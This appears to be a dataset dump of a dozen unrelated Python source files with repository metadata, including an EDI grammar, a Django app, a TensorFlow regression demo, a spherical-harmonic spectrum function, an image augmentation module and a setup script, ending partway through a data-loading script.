| no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,421 | py | #Generated by bots open source edi translator from UN-docs.
from bots.botsconfig import *
from edifact import syntax
from recordsD11AUN import recorddefs
structure = [
{ID: 'UNH', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGM', MIN: 1, MAX: 1},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'FCA', MIN: 1, MAX: 1},
{ID: 'DOC', MIN: 1, MAX: 40},
{ID: 'INP', MIN: 0, MAX: 20},
{ID: 'FTX', MIN: 0, MAX: 15},
{ID: 'FII', MIN: 1, MAX: 7, LEVEL: [
{ID: 'RFF', MIN: 0, MAX: 1},
{ID: 'CTA', MIN: 0, MAX: 1},
{ID: 'COM', MIN: 0, MAX: 5},
]},
{ID: 'NAD', MIN: 1, MAX: 9, LEVEL: [
{ID: 'RFF', MIN: 0, MAX: 3},
{ID: 'CTA', MIN: 0, MAX: 1},
{ID: 'COM', MIN: 0, MAX: 5},
]},
{ID: 'PYT', MIN: 1, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'FTX', MIN: 0, MAX: 1},
]},
{ID: 'MOA', MIN: 1, MAX: 5, LEVEL: [
{ID: 'FTX', MIN: 0, MAX: 1},
]},
{ID: 'TDT', MIN: 0, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'LOC', MIN: 0, MAX: 3},
]},
{ID: 'GEI', MIN: 0, MAX: 10, LEVEL: [
{ID: 'MOA', MIN: 0, MAX: 1},
{ID: 'LOC', MIN: 0, MAX: 2},
{ID: 'NAD', MIN: 0, MAX: 1},
{ID: 'RCS', MIN: 0, MAX: 1},
{ID: 'FTX', MIN: 0, MAX: 10},
]},
{ID: 'AUT', MIN: 0, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
]},
{ID: 'UNT', MIN: 1, MAX: 1},
]},
]
| [
"[email protected]"
]
| |
732aa5dde56b43bc0f071270e29ec985954b334e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03346/s258893438.py | 945e31f4eeb13ab37b2dc35c29cda1e50389a8ca | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | import sys
input = sys.stdin.readline
import heapq
def read():
N = int(input().strip())
P = []
for i in range(N):
p = int(input().strip())
P.append(p)
return N, P
def solve(N, P):
Q = [0 for i in range(N)]
for i in range(N):
Q[P[i]-1] = i
max_count = 0
count = 0
prev = -1
for i in range(N):
q = Q[i]
if prev < q:
count += 1
prev = q
else:
max_count = max(max_count, count)
count = 1
prev = q
max_count = max(max_count, count)
return N - max_count
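# Sketch of the idea: Q[v] is the position of value v+1 in P; the longest run of
# consecutive values whose positions strictly increase can stay in place, and
# every other element must be moved exactly once. E.g. P = [3, 1, 4, 2] gives
# Q = [1, 3, 0, 2]; the longest such run has length 2, so the answer is 4 - 2 = 2.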
if __name__ == '__main__':
inputs = read()
print("%s" % solve(*inputs))
| [
"[email protected]"
]
| |
18f082ffc446b47fa664e4b53b891ae87ac64a7e | b0b87924d07101e25fa56754ceaa2f22edc10208 | /workspace/DL/DL3-2.py | ae888fd2295b854fffc3b000ca76341442b1ef96 | []
| no_license | SoheeKwak/Python | 2295dd03e5f235315d07355cbe72998f8b86c147 | e1a5f0ecf31e926f2320c5df0e3416306b8ce316 | refs/heads/master | 2020-04-02T13:49:58.367361 | 2018-11-23T09:33:23 | 2018-11-23T09:33:23 | 154,499,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 704 | py | import tensorflow as tf
# w와 b에 대한 초기값을 부여한 상태에서 모델링
w=tf.Variable([.3], tf.float32)
b=tf.Variable([-.3], tf.float32)
x=tf.placeholder(tf.float32)
y=tf.placeholder(tf.float32)
lm=x*w+b
loss=tf.reduce_sum(tf.square(lm-y))
train=tf.train.GradientDescentOptimizer(0.01).minimize(loss)
x_train=[1,2,3,4]
y_train=[0,-1,-2,-3]
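# With this data the optimum is w = -1, b = 1 (since y = -x + 1), so wv and bv
# should approach those values and lossv should approach 0 as training proceeds.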
# Train for 1000 iterations -> build the model
# Print w, b and the loss of the trained model
sess=tf.Session()
sess.run(tf.global_variables_initializer())
for i in range(1000):
sess.run(train,feed_dict={x:x_train,y:y_train})
wv, bv, lossv = sess.run([w,b,loss],feed_dict={x:x_train, y:y_train})
print("w값:%s b값:%s loss값:%s" % (wv, bv, lossv))
| [
"[email protected]"
]
| |
4a9a89a9bd4fe83f91578a20cf8ba51411b5e658 | b9b7bf5d82ffc7c972dda803241c3e6247a92002 | /pyshtools/spectralanalysis/spectrum.py | 048b9436736827a5214869cb2a7209fb92ee713e | [
"BSD-3-Clause"
]
| permissive | MMesch/SHTOOLS | 9aff298b8075f7d9fad9690ab2053e934197403d | 72bf04fb9b83f17c2dac2a8f252a8634d6f7588a | refs/heads/master | 2021-01-24T20:02:42.911226 | 2017-12-25T22:35:00 | 2017-12-25T22:35:00 | 26,169,620 | 1 | 0 | null | 2016-08-29T11:57:46 | 2014-11-04T13:22:14 | null | UTF-8 | Python | false | false | 4,810 | py | import numpy as _np
def spectrum(clm, normalization='4pi', degrees=None, lmax=None,
convention='power', unit='per_l', base=10.):
"""
Return the spectrum of the spherical harmonic coefficients as a function
of spherical harmonic degree.
Usage
-----
array = spectrum(clm, [normalization, degrees, lmax, convention,
unit, base])
Returns
-------
array : ndarray, shape (len(degrees))
1-D ndarray of the spectrum.
Parameters
----------
clm : ndarray, shape (2, lmax + 1, lmax + 1)
ndarray containing the spherical harmonic coefficients.
normalization : str, optional, default = '4pi'
'4pi', 'ortho' or 'schmidt' for geodesy 4pi normalized,
orthonormalized, or Schmidt semi-normalized coefficients, respectively.
lmax : int, optional, default = len(clm[0,:,0]) - 1.
Maximum spherical harmonic degree to output.
degrees : ndarray, optional, default = numpy.arange(lmax+1)
Array containing the spherical harmonic degrees where the spectrum
is computed.
convention : str, optional, default = 'power'
The type of spectrum to return: 'power' for power spectrum, 'energy'
for energy spectrum, and 'l2norm' for the l2 norm spectrum.
unit : str, optional, default = 'per_l'
If 'per_l', return the total contribution to the spectrum for each
spherical harmonic degree l. If 'per_lm', return the average
contribution to the spectrum for each coefficient at spherical
harmonic degree l. If 'per_dlogl', return the spectrum per log
interval dlog_a(l).
base : float, optional, default = 10.
The logarithm base when calculating the 'per_dlogl' spectrum.
Description
-----------
This function returns either the power spectrum, energy spectrum, or
l2-norm spectrum. Total power is defined as the integral of the
function squared over all space, divided by the area the function
spans. If the mean of the function is zero, this is equivalent to the
variance of the function. The total energy is the integral of the
function squared over all space and is 4pi times the total power. The
l2-norm is the sum of the magnitude of the coefficients squared.
    The output spectrum can be expressed using one of three units. 'per_l'
    returns the contribution to the total spectrum from all angular orders
    at degree l. 'per_lm' returns the average contribution to the total
    spectrum from a single coefficient at degree l. The 'per_lm' spectrum
    is equal to the 'per_l' spectrum divided by (2l+1). 'per_dlogl' returns
    the contribution to the total spectrum from all angular orders over an
    infinitesimal logarithmic degree band. The contribution in the band
    dlog_a(l) is spectrum(l, 'per_dlogl')*dlog_a(l), where a is the base,
    and where spectrum(l, 'per_dlogl') is equal to
    spectrum(l, 'per_l')*l*log(a).
"""
if lmax is None:
lmax = len(clm[0, :, 0]) - 1
if (degrees is None):
degrees = _np.arange(lmax+1)
ndegrees = len(degrees)
array = _np.empty(ndegrees)
# First compute l2norm, and then convert to the required normalization
if _np.iscomplexobj(clm):
for i, l in enumerate(degrees):
array[i] = (clm[0, l, 0:l + 1] *
clm[0, l, 0:l + 1].conjugate()).real.sum() + \
(clm[1, l, 1:l + 1] *
clm[1, l, 1:l + 1].conjugate()).real.sum()
else:
for i, l in enumerate(degrees):
array[i] = (clm[0, l, 0:l+1]**2).sum() \
+ (clm[1, l, 1:l+1]**2).sum()
if convention.lower() == 'l2norm':
pass
elif convention.lower() in ('power', 'energy'):
if normalization == '4pi':
pass
elif normalization == 'schmidt':
array /= (2.0 * degrees + 1.0)
elif normalization == 'ortho':
array /= (4.0 * _np.pi)
else:
raise ValueError(
"normalization must be '4pi', 'ortho', or 'schmidt'. " +
"Input value was {:s}".format(repr(normalization)))
else:
raise ValueError(
"convention must be 'power', 'energy', or 'l2norm'. " +
"Input value was {:s}".format(repr(convention)))
if convention.lower() == 'energy':
array *= 4.0 * _np.pi
if unit.lower() == 'per_l':
pass
elif unit.lower() == 'per_lm':
array /= (2.0 * degrees + 1.0)
elif unit.lower() == 'per_dlogl':
array *= degrees * _np.log(base)
else:
raise ValueError(
"unit must be 'per_l', 'per_lm', or 'per_dlogl'." +
"Input value was {:s}".format(repr(unit)))
return array
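# Minimal usage sketch (hypothetical coefficients, not from the pyshtools docs):
#   clm = _np.zeros((2, 3, 3))
#   clm[0, 2, 0] = 1.0                  # single unit 4pi-normalized coefficient at l=2
#   spectrum(clm)                       # -> array([0., 0., 1.]) ('power', 'per_l')
#   spectrum(clm, convention='energy')  # -> the same spectrum scaled by 4*pi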
| [
"[email protected]"
]
| |
967d0339908521e033f2e7ab5123aaae8a304dc1 | 4b8b0be0588f9e5249729f165b72a6b38324837d | /setup.py | fe4f9c413e1a971588bfa6a67604b75d511472a3 | []
| no_license | GlycReSoft2/embed_tandem_ms_classifier | 5e2f569f2b74f2f14f1c1c0cede32de99c150890 | 0495f2234562a9c5dd02d545800c077df2305387 | refs/heads/master | 2020-06-02T09:32:55.457664 | 2015-06-20T21:30:19 | 2015-06-20T21:30:19 | 22,615,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,718 | py | import sys
from setuptools import setup, find_packages, Extension
# With gratitude to the SqlAlchemy setup.py authors
from distutils.command.build_ext import build_ext
from distutils.errors import (CCompilerError, DistutilsExecError,
DistutilsPlatformError)
ext_errors = (CCompilerError, DistutilsExecError, DistutilsPlatformError)
if sys.platform == 'win32':
# 2.6's distutils.msvc9compiler can raise an IOError when failing to
# find the compiler
ext_errors += (IOError,)
c_ext = "pyx"
try:
from Cython.Build import cythonize
except:
c_ext = "c"
extensions = [
Extension("glycresoft_ms2_classification.utils.cmass_heap",
["glycresoft_ms2_classification/utils/cmass_heap." + c_ext]),
Extension("glycresoft_ms2_classification.ms.ion_matching",
["glycresoft_ms2_classification/ms/ion_matching." + c_ext]),
Extension("glycresoft_ms2_classification.structure.composition.ccomposition",
["glycresoft_ms2_classification/structure/composition/ccomposition." + c_ext])
]
if c_ext == "pyx":
extensions = cythonize(extensions, annotate=True)
cmdclass = {}
class BuildFailed(Exception):
def __init__(self):
self.cause = sys.exc_info()[1] # work around py 2/3 different syntax
def __str__(self):
return str(self.cause)
class ve_build_ext(build_ext):
# This class allows C extension building to fail.
def run(self):
try:
build_ext.run(self)
except DistutilsPlatformError:
raise BuildFailed()
def build_extension(self, ext):
try:
build_ext.build_extension(self, ext)
except ext_errors:
raise BuildFailed()
except ValueError:
# this can happen on Windows 64 bit, see Python issue 7511
if "'path'" in str(sys.exc_info()[1]): # works with both py 2/3
raise BuildFailed()
raise
cmdclass['build_ext'] = ve_build_ext
def status_msgs(*msgs):
print('*' * 75)
for msg in msgs:
print(msg)
print('*' * 75)
def run_setup(include_cext=True):
setup(
name="GlycReSoft",
version="1.0.2",
packages=find_packages(),
install_requires=[
"scikit-learn >= 0.14.1",
"pandas >= 0.14.0",
"pyyaml >= 3.11",
"pyteomics >= 2.5",
"sqlitedict >= 1.1.0",
"numexpr >= 2.1",
"xray >= 0.3.2"
],
cmdclass=cmdclass,
zip_safe=False,
include_package_data=True,
package_data={
'glycresoft_ms2_classification': ["*.csv", "*.xml", "*.json", "data/*.csv"],
'glycresoft_ms2_classification.structure': ["structure/data/*.csv", "structure/data/*.json"]
},
ext_modules=extensions if include_cext else None,
entry_points={
'console_scripts': [
"glycresoft-ms2 = glycresoft_ms2_classification.__main__:main",
],
'setuptools.installation': [
"eggsecutable = glycresoft_ms2_classification.__main__:main"
]
},
namespace_packages=["glycresoft_ms2_classification"]
)
try:
run_setup(True)
except Exception as exc:
status_msgs(
str(exc),
"WARNING: The C extension could not be compiled, " +
"speedups are not enabled.",
"Failure information, if any, is above.",
"Retrying the build without the C extension now."
)
run_setup(False)
status_msgs(
"WARNING: The C extension could not be compiled, " +
"speedups are not enabled.",
"Plain-Python build succeeded."
)
| [
"[email protected]"
]
| |
7922391a74fbb335d75565df7e040ef6f5fd5cd2 | 7655e4915fc37c795386252949f4888cb8741510 | /movie_data/models.py | 305dc3ecbfa149f5ff009b3e428035c963dfae5c | []
| no_license | StillsSma/django_movies | 59cf883730ced26172fe1c4ad3dbea87e8d4624d | cf49e429ebf957f5b5068dcdfe6517e47bbfcaba | refs/heads/master | 2021-01-17T16:23:46.585776 | 2016-12-31T17:36:08 | 2016-12-31T17:36:08 | 70,194,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,621 | py | from django.db import models
# Create your models here.
class Movie(models.Model):
#movideid = models.IntegerField(primary_key=True)
movie_title = models.CharField(max_length=100)
release_date = models.CharField(max_length=11)
videorelease_date = models.CharField(max_length=10)
IMDbURL = models.CharField(max_length=150)
unknown = models.BooleanField()
action = models.BooleanField()
adventure = models.BooleanField()
animation = models.BooleanField()
children = models.BooleanField()
comedy = models.BooleanField()
crime = models.BooleanField()
documentary = models.BooleanField()
drama = models.BooleanField()
fantasy = models.BooleanField()
film_noir = models.BooleanField()
horror = models.BooleanField()
musical = models.BooleanField()
mystery = models.BooleanField()
romance = models.BooleanField()
sciFi = models.BooleanField()
thriller = models.BooleanField()
war = models.BooleanField()
western = models.BooleanField()
def __str__(self):
return self.movie_title
class Rater(models.Model):
#raterid = models.IntegerField(primary_key=True)
age = models.IntegerField()
gender = models.CharField(max_length=1)
occupation = models.CharField(max_length=20)
zipcode = models.CharField(max_length=10)
def __str__(self):
        return str(self.id)  # __str__ must return a string, not an int
class Rating(models.Model):
rater = models.ForeignKey(Rater)
movie = models.ForeignKey(Movie)
rating = models.IntegerField()
timestmp = models.IntegerField()
def __str__(self):
        return "%s (%s)" % (self.movie, self.rating)  # __str__ must return a single string, not a tuple
| [
"[email protected]"
]
| |
ac2b903968d57e5a20ad2475bdd901522ae13bf0 | abc24a58da46f02551e09b229087420f70b37ddf | /att/upeek/upeek/augment.py | a99891e2ef13c34d68eca5bc4cb9817cad4c0974 | []
| no_license | erikperillo/att | bfd7198a0ea3687e1fac952e2aa6510911b8db19 | 4b02fefc40c4dfde2549857272ad943bff168a7e | refs/heads/master | 2020-07-03T19:36:47.195578 | 2018-07-18T14:30:02 | 2018-07-18T14:30:02 | 67,546,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,037 | py | """
The MIT License (MIT)
Copyright (c) 2017 Erik Perillo <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.
"""
"""
Module for data augmentation.
"""
from skimage import io
from skimage import transform as skt
from skimage import filters as skf
import numpy as np
def _get_rng(rng):
if not isinstance(rng, (list, tuple)):
rng = (rng, rng)
return rng
def _rot90(arr, reps=1):
"""
Performs 90 degrees rotation 'reps' times.
Assumes image with shape ([n_samples, n_channels,] height, width).
"""
for __ in range(reps%4):
arr = arr.swapaxes(-2, -1)[..., ::-1]
return arr
def rot90(x, y, reps=1):
x, y = _rot90(x, reps), y if y is None else _rot90(y, reps)
return x, y
def _hmirr(img):
"""
Flips image horizontally.
Assumes image with shape ([n_samples, n_channels,] height, width).
"""
return img[..., ::-1]
def hmirr(x, y):
x, y = _hmirr(x), y if y is None else _hmirr(y)
return x, y
def some_of(x, y=None, ops=[]):
"""
Chooses one operation from ops.
"""
op = np.random.choice(ops)
x = op(x)
if y is not None:
y = op(y)
return x, y
def _rotation(img, angle, **kwargs):
"""
Rotates image in degrees in counter-clockwise direction.
Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
"""
img = img.swapaxes(0, 1).swapaxes(1, 2)
img = skt.rotate(img, angle=angle, resize=False, mode="constant",
preserve_range=True, **kwargs).astype(img.dtype)
img = img.swapaxes(2, 1).swapaxes(1, 0)
return img
def rotation(x, y, rng, **kwargs):
angle = np.random.uniform(*rng)
x = _rotation(x, angle, **kwargs)
y = y if y is None else _rotation(y, angle, **kwargs)
return x, y
def _shear(img, shear):
"""
Shears image.
Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
"""
at = skt.AffineTransform(shear=shear)
img = img.swapaxes(0, 1).swapaxes(1, 2)
img = skt.warp(img, at)
img = img.swapaxes(2, 1).swapaxes(1, 0)
return img
def shear(x, y, rng, **kwargs):
shear = np.random.uniform(*rng)
x, y = _shear(x, shear), y if y is None else _shear(y, shear)
return x, y
def _translation(img, transl):
"""
Performs shift in image in dx, dy = transl.
Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
"""
at = skt.AffineTransform(translation=transl)
img = img.swapaxes(0, 1).swapaxes(1, 2)
img = skt.warp(img, at)
img = img.swapaxes(2, 1).swapaxes(1, 0)
return img
def translation(x, y, rng):
h, w = x.shape[-2:]
transl = (int(np.random.uniform(*rng)*w), int(np.random.uniform(*rng)*h))
x, y = _translation(x, transl), y if y is None else _translation(y, transl)
return x, y
def _add_noise(img, noise):
"""
Adds noise to image.
Assumes image in [0, 1].
"""
img = img + noise
return img
def add_noise(x, y, rng):
noise = np.random.uniform(*rng, size=x.shape).astype("float32")
x, y = _add_noise(x, noise), y
return x, y
def _mul_noise(img, noise):
"""
Multiplies image by a factor.
Assumes image in [0, 1].
"""
img = img*noise
return img
def mul_noise(x, y, rng):
noise = np.random.uniform(*rng)
x, y = _mul_noise(x, noise), y
return x, y
def _blur(img, sigma):
"""
Applies gaussian blur to image.
Assumes image in [0, 1] with shape ([n_samples, n_channels,] height, width).
"""
img = img.swapaxes(0, 1).swapaxes(1, 2)
for i in range(img.shape[-1]):
img[..., i] = skf.gaussian(img[..., i], sigma=sigma)
img = img.swapaxes(2, 1).swapaxes(1, 0)
return img
def blur(x, y, rng=0.5):
    rng = _get_rng(rng)  # allow a scalar default; np.random.uniform(*rng) needs a (low, high) pair
    sigma = np.random.uniform(*rng)
x, y = _blur(x, sigma), y
return x, y
def identity(x, y):
return x, y
def _unit_norm(img, minn, maxx, dtype="float32"):
img = ((img - minn)/max(maxx - minn, 1)).astype(dtype)
return img
def _unit_denorm(img, minn, maxx, dtype="float32"):
img = (img*(maxx - minn) + minn).astype(dtype)
return img
#mapping of strings to methods
OPS_MAP = {
"rot90": rot90,
"rotation": rotation,
"shear": shear,
"translation": translation,
"add_noise": add_noise,
"mul_noise": mul_noise,
"blur": blur,
"identity": identity,
"hmirr": hmirr,
}
def augment(xy, op_seqs, apply_on_y=False, add_iff_op=True):
"""
Performs data augmentation on x, y sample.
op_seqs is a list of sequences of operations.
Each sequence must be in format (op_name, op_prob, op_kwargs).
Example of valid op_seqs:
[
[
('identity', 1.0, {}),
],
[
('hmirr', 1.0, {}),
('rot90', 1.0, {'reps': 3})
],
[
('rotation', 0.5, {'rng': (-10, 10)}),
]
]
('identity' is necessary to keep the original image in the returned list.)
add_iff_op: adds image to augm list only if some operation happened.
"""
#list of augmented images
augm = []
#pre-processing x, y for augmentation
x, y = xy
x_minn, x_maxx, x_dtype = x.min(), x.max(), x.dtype
x = _unit_norm(x, x_minn, x_maxx, "float32")
if apply_on_y:
y_minn, y_maxx, y_dtype = y.min(), y.max(), y.dtype
y = _unit_norm(y, y_minn, y_maxx, "float32")
#applying sequences
for op_seq in op_seqs:
_x, _y = x.copy(), y.copy() if apply_on_y else None
some_op = False
#applying sequence of operations
for name, prob, kwargs in op_seq:
op = OPS_MAP[name]
if np.random.uniform(0.0, 1.0) <= prob:
some_op = True
_x, _y = op(_x, _y, **kwargs)
#adding sample to augm list
if some_op or not add_iff_op:
_x = _unit_denorm(_x, x_minn, x_maxx, x_dtype)
if apply_on_y:
_y = _unit_denorm(_y, y_minn, y_maxx, y_dtype)
augm.append((_x, _y if apply_on_y else y))
return augm
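# Minimal usage sketch (hypothetical arrays; op names must be keys of OPS_MAP):
#   x = np.random.rand(3, 64, 64).astype("float32")          # (channels, h, w)
#   y = (np.random.rand(1, 64, 64) > 0.5).astype("float32")  # e.g. a mask
#   pairs = augment((x, y), op_seqs=[[("hmirr", 1.0, {})]], apply_on_y=True)
#   # -> [(hmirr(x), hmirr(y))]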
| [
"[email protected]"
]
| |
c97351ef49dfe8735e8b6a5599c8b563241932cd | 077c91b9d5cb1a6a724da47067483c622ce64be6 | /syn_mem_corruption_3switch_fuzzer_mcs/intermcs_7_/interactive_replay_config.py | f85bde175e0795cebfea56199299bdfee1f657fc | []
| no_license | Spencerx/experiments | 0edd16398725f6fd9365ddbb1b773942e4878369 | aaa98b0f67b0d0c0c826b8a1565916bf97ae3179 | refs/heads/master | 2020-04-03T10:11:40.671606 | 2014-06-11T23:55:11 | 2014-06-11T23:55:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py |
from config.experiment_config_lib import ControllerConfig
from sts.topology import *
from sts.control_flow import InteractiveReplayer
from sts.simulation_state import SimulationConfig
from sts.input_traces.input_logger import InputLogger
simulation_config = SimulationConfig(controller_configs=[ControllerConfig(start_cmd='./pox.py --verbose openflow.of_01 --address=__address__ --port=__port__ openflow.discovery forwarding.l2_multi_syn_mem_corruption', label='c1', address='127.0.0.1', cwd='pox')],
topology_class=MeshTopology,
topology_params="num_switches=4",
patch_panel_class=BufferedPatchPanel,
multiplex_sockets=False,
kill_controllers_on_exit=True)
control_flow = InteractiveReplayer(simulation_config, "experiments/syn_mem_corruption_3switch_fuzzer_mcs/intermcs_7_/mcs.trace.notimeouts")
# wait_on_deterministic_values=False
# delay_flow_mods=False
# Invariant check: 'InvariantChecker.check_liveness'
# Bug signature: "c1"
| [
"[email protected]"
]
| |
e1147a359018bf44948d2604c26fc6f0e527ea4f | cba46e28e6f60d9bd8cc8c24a3ff8e065e5a8e49 | /scrap_trade_proj/customers/migrations/0019_auto_20191031_1014.py | a3e1ab6db2b7d3beb3329c5de1c8a7ede469ddaa | []
| no_license | Horac-Bouthon/scrap-trade-4 | fb7e9f8f9ec41446318ce03ad5ff7024ad795771 | 7686703ce5783dd4a48dc1d9600cda01aa554faa | refs/heads/master | 2022-12-12T21:52:38.209500 | 2020-03-17T07:50:30 | 2020-03-17T07:50:30 | 227,142,003 | 0 | 0 | null | 2022-11-22T04:39:35 | 2019-12-10T14:33:20 | Python | UTF-8 | Python | false | false | 1,185 | py | # Generated by Django 2.2.6 on 2019-10-31 10:14
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('customers', '0018_auto_20191031_0930'),
]
operations = [
migrations.RemoveField(
model_name='customer',
name='customer_description',
),
migrations.CreateModel(
name='CustomerTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language', models.CharField(choices=[('en', 'English'), ('de', 'German'), ('cs', 'Czech')], max_length=15, verbose_name='language')),
('customer_description', models.TextField(blank=True, help_text='Short text to discribe the Customer.', null=True, verbose_name='Customer description')),
('model', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='customers.Customer', verbose_name='customer')),
],
options={
'abstract': False,
},
),
]
| [
"[email protected]"
]
| |
41bae6481bf4d06f0950f00aeb2ce5087d1eb34d | 5c8139f1e57e06c7eaf603bd8fe74d9f22620513 | /PartC/py字符串的全排列.py | 05bb54b8b4bcd922bdbe01c4e98fa05bea5670c4 | []
| no_license | madeibao/PythonAlgorithm | c8a11d298617d1abb12a72461665583c6a44f9d2 | b4c8a75e724a674812b8a38c0202485776445d89 | refs/heads/master | 2023-04-03T07:18:49.842063 | 2021-04-11T12:02:40 | 2021-04-11T12:02:40 | 325,269,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 212 | py |
from itertools import permutations
string = list(input())
string.sort()
for item in permutations(string):
item = ''.join(item)
print(item)
print('')
# abc
# 输出结果:
abc
acb
bac
bca
cab
cba
| [
"[email protected]"
]
| |
d95bc3af87a938f03bfa83472e86030ed654c535 | 628ab6e412e7c4c755bc42d8137acd3da2d4be0e | /apysc/display/line_cap_interface.py | bf9828ca64f0eef0a21e9688109051205fdc76d5 | [
"MIT",
"CC-BY-4.0"
]
| permissive | TrendingTechnology/apysc | ffd7d9b558707b934c5df127eca817d4f12d619b | 5c6a4674e2e9684cb2cb1325dc9b070879d4d355 | refs/heads/main | 2023-06-01T20:19:20.835539 | 2021-06-20T03:53:33 | 2021-06-20T03:53:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,734 | py | """Class implementation for line cap interface.
"""
from typing import Any
from typing import Dict
from typing import Union
from apysc import String
from apysc.display.line_caps import LineCaps
from apysc.type.revert_interface import RevertInterface
from apysc.type.variable_name_interface import VariableNameInterface
class LineCapInterface(VariableNameInterface, RevertInterface):
_line_cap: String
def _initialize_line_cap_if_not_initialized(self) -> None:
"""
        Initialize the _line_cap attribute if it is not
        initialized yet.
"""
if hasattr(self, '_line_cap'):
return
self._line_cap = String(LineCaps.BUTT.value)
@property
def line_cap(self) -> Any:
"""
Get this instance's line cap style setting.
Returns
-------
line_cap : String
Line cap style setting.
"""
self._initialize_line_cap_if_not_initialized()
return self._line_cap._copy()
@line_cap.setter
def line_cap(self, value: Any) -> None:
"""
Set line cap style setting.
Parameters
----------
value : String or LineCaps
Line cap style setting to set.
"""
self._update_line_cap_and_skip_appending_exp(value=value)
self._append_line_cap_update_expression()
def _append_line_cap_update_expression(self) -> None:
"""
Append line cap updating expression to file.
"""
from apysc.expression import expression_file_util
from apysc.type import value_util
cap_name: str = value_util.get_value_str_for_expression(
value=self._line_cap)
expression: str = (
f'{self.variable_name}.attr({{"stroke-linecap": {cap_name}}});'
)
expression_file_util.append_js_expression(expression=expression)
def _update_line_cap_and_skip_appending_exp(
self, value: Union[String, LineCaps]) -> None:
"""
Update line cap and skip appending expression to file.
Parameters
----------
value : String or LineCaps
Line cap style setting to set.
"""
from apysc.validation.display_validation import validate_line_cap
if not isinstance(value, (String, LineCaps)):
raise TypeError(
'Not supported line_cap type specified: '
f'{type(value)}'
'\nAcceptable ones are: String or LineCaps.')
validate_line_cap(cap=value)
if isinstance(value, String):
self._line_cap = value._copy()
else:
self._line_cap = String(value.value)
_line_cap_snapshots: Dict[str, str]
def _make_snapshot(self, snapshot_name: str) -> None:
"""
Make value's snapshot.
Parameters
----------
snapshot_name : str
Target snapshot name.
"""
if not hasattr(self, '_line_cap_snapshots'):
self._line_cap_snapshots = {}
if self._snapshot_exists(snapshot_name=snapshot_name):
return
self._initialize_line_cap_if_not_initialized()
self._line_cap_snapshots[snapshot_name] = self._line_cap._value
def _revert(self, snapshot_name: str) -> None:
"""
Revert value if snapshot exists.
Parameters
----------
snapshot_name : str
Target snapshot name.
"""
if not self._snapshot_exists(snapshot_name=snapshot_name):
return
self._line_cap._value = self._line_cap_snapshots[snapshot_name]
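# Minimal usage sketch (illustrative; assumes a concrete apysc display object
# that mixes in LineCapInterface, here called `line_obj`):
#     line_obj.line_cap = LineCaps.ROUND   # set via the LineCaps enum
#     line_obj.line_cap = String('butt')   # or via an apysc String
#     current = line_obj.line_cap          # getter returns a copied String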
| [
"[email protected]"
]
| |
db5504e104deb39722576dde7ff2496054907854 | 9827269c84a2afc599a8ac8ac88027b25ef74d78 | /02_51409_wsd_test.py | bbf880931362d50fdacd70498414a064641df60d | []
| no_license | caonlp/wsd_bert_tensorflow_version | 2dbb7883d8a1bc5cedbe0d69a04a8cdda3ce757f | 7cf786d1803ac6e49292469b1afdf71838295b25 | refs/heads/main | 2023-03-13T22:45:26.361832 | 2021-03-04T06:35:06 | 2021-03-04T06:35:06 | 344,372,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,310 | py | import tensorflow as tf
import numpy as np
import codecs
from keras.utils import to_categorical
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def load_wsd_train_x():
wsd_train_x = codecs.open('51409_train_data', mode = 'r', encoding= 'utf-8')
line = wsd_train_x.readline()
list1 = []
while line:
a = line.split()
b = a[3:]
list1.append(b)
line = wsd_train_x.readline()
    wsd_train_x.close()
    return np.array(list1)
def load_wsd_test_x():
